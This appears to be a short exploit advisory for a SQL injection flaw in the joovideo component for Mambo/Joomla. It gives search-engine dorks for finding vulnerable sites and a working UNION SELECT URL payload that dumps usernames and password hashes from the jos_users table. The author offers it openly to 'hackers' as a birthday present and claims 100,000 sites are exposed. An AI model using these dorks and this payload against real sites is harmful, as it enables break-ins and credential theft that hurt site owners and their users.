joomlajoovideo-sql.txt

`##########################################  
#  
# Mambo Component com_joovideo SQL Injection(Powered by joovideo V1.0)  
#  
##########################################  
#  
##AUTHOR : S@BUN  
#  
####HOME : http://www.milw0rm.com/author/1334  
#  
####MAİL : [email protected]  
#  
###########################################  
TODAY MY BİRTDAY  
SOO I WROTE 5 BUGS ALL FOR HACKERS  
5 EXPLOİTS HAVE 100.000 MAMBO-JOOMLA WEBPAGES OR MUCH MORE  
DONT FORGET MY PRESENT HACKERS  
GOOD LUCKY  
  
100.000 DEN FAZLA MAMBO NE JOOMLA WEBSiTESi  
YASGUNUM NEDENiYLE HEDiYE  
iYi SANLAR  
  
you can see all my exploits  
  
http://my.opera.com/SQL-Injection/blog/  
  
###########################################  
#  
# DORK 1 : allinurl: "com_joovideo" detail  
#  
# DORK 2 : allinurl: "com_joovideo"  
#  
# DORK 3 : Powered by joovideo V1.0  
#  
###########################################  
EXPLOIT :  
  
index.php?option=com_joovideo&Itemid=S@BUN&task=detail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*  
  
###########################################  
##################S@BUN####################  
###########################################  
#####[email protected]#####  
###########################################  
  
side note:  
<name>joovideo</name>  
<creationDate>18.04.2007</creationDate>  
<author>joomlapixel</author>  
<copyright>This component in released under the commercial License</copyright>  
<authorEmail>[email protected]</authorEmail>  
  
<authorUrl>www.joomlapixel.eu</authorUrl>  
<version>1.2.2</version>  
<description>joovideo! video manager semplificato per joomla!, versione commerciale</description>  
  
`